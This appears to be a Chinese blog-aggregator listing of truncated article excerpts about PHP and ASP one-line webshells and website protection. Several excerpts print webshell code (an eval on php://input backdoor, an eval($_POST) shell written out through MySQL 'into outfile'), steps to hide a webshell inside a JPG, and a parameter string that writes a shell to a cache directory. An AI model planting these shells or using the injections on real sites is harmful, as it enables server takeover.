网站安全狗功能涵盖了网马/木马扫描、防SQL注入、防盗链、网站后台防护、一句话木马防护、防CC攻击、网站流量实时监控、网站CPU监控、、IP黑白名单管理、网页防篡改功能等模块。能够为用户提供实时的网站安全防护...
分类:
Web程序 时间:
2015-07-01 12:35:57
阅读次数:
373
一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents('php://input'))我是个...
分类:
Web程序 时间:
2015-05-19 12:41:25
阅读次数:
164
主要亮点:图片木马(可以正常打开显示的木马)先看代码:仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。1、找一张图片,名字改成1.jpg2、存为1.asp(就是一句话木马)3、copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件注:以上三个文件放在同一目录...
分类:
其他好文 时间:
2015-05-06 10:34:51
阅读次数:
355
asp一句话木马: php一句话木马: aspx一句话木马: 其他一句话木马: "" Then Execute(Request("value"))%> ""then session("value")=request("value"):end if:if sessio...
分类:
其他好文 时间:
2015-04-11 17:34:58
阅读次数:
358
MySQL:DropTABLEIFEXISTStemp;//如果存在temp就删掉CreateTABLEtemp(cmdtextNOTNULL);//建立temp表,里面就一个cmd字段InsertINTOtemp(cmd)VALUES(<?phpeval($_POST[cmd]);?>);//把一句话木马插入到temp表SelectcmdfromtempintooutfileF:/wwwroot/eval.php;//查询temp表..
分类:
数据库 时间:
2014-12-24 06:30:25
阅读次数:
237
强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。1.利用404页面隐藏PHP小马: 1 2 3 404 Not Found 4 5 Not Found ...
分类:
Web程序 时间:
2014-12-20 16:51:04
阅读次数:
301
在其域名后加上这样一段代码:login.php?makehtml=1&chdb[htmlname]=xx.php& chdb[path]=cache&content=。这段代码 的意思利用login.php文件将这段代码写入到网站缓存目录 cache的xx.php文件中。“”就是一句话木马的服务端。...
分类:
Web程序 时间:
2014-12-18 06:50:08
阅读次数:
176
工具下载地址:http://pan.baidu.com/s/1o6jxAgq这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<formmethod="post">
<inputtype=textname="cmd"size=60>..
分类:
Web程序 时间:
2014-12-15 06:37:08
阅读次数:
1439
服务器上发现被植了很多木马,而且还让人肆意使用...NND
使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行...
分类:
Web程序 时间:
2014-09-09 23:05:46
阅读次数:
257